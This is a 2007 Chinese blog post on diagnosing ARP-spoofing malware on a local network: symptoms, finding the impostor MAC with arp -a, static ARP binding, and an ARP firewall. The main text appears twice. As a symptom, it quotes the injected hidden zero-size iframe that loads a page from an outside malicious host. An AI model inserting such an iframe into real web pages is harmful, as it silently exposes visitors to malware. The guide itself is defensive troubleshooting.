不错呦!smile@林凯西,确保“准备文件”中的几个文件都有安装,S...您好,看了您这篇帖子觉得很有帮助。但是有个问题想请...我的修改过了怎么还被恶意注册呢 @jjjjiiii 用PJ快9年了,主要是A...PJ3啊,貌似很少有人用PJ了,现在不是WP就是z...@332347365,我当时接入时错误码没有-10...楼主,ChkValue值应为-103是什么意思呢?...大哥 你最近能看到我发的信息,请跟我联系,我有个制...
找出局域网ARP欺骗的病毒源
编辑:dnawo 日期:2007-06-19
一、症状
先是不断弹出IP冲突信息,之后访问所有站点发现在代码的第一行都被加了"<iframe src=http://6688.89111.cn/123.htm width=0 height=0></iframe>"。
二、查找病毒源
打开cmd,执行arp -a,显示如下:

而服务器的网卡的MAC地址应为:00-13-20-49-6b-c4,显然是有机子冒充了服务器。只要查找网内哪台机子网卡MAC地址为00-E0-50-A8-DB-7A并进行处理就好了。
三、应急方法
对于局域网的其他成员,在网络管理员还没清除病毒前可采取一些措施来阻止ARP欺骗。
1.手工绑定服务器MAC地址。cmd中执行"arp -d"清除arp缓存列表,再执行"arp -s 服务器IP 服务器MAC地址"
2.安装ARP防火墙单机版。它是专业的ARP攻击防火墙,[点击下载]
先是不断弹出IP冲突信息,之后访问所有站点发现在代码的第一行都被加了"<iframe src=http://6688.89111.cn/123.htm width=0 height=0></iframe>"。
二、查找病毒源
打开cmd,执行arp -a,显示如下:

而服务器的网卡的MAC地址应为:00-13-20-49-6b-c4,显然是有机子冒充了服务器。只要查找网内哪台机子网卡MAC地址为00-E0-50-A8-DB-7A并进行处理就好了。
三、应急方法
对于局域网的其他成员,在网络管理员还没清除病毒前可采取一些措施来阻止ARP欺骗。
1.手工绑定服务器MAC地址。cmd中执行"arp -d"清除arp缓存列表,再执行"arp -s 服务器IP 服务器MAC地址"
2.安装ARP防火墙单机版。它是专业的ARP攻击防火墙,[点击下载]
评论: 1 | 引用: 0 | 查看次数: 6151
发表评论
请登录后再发表评论!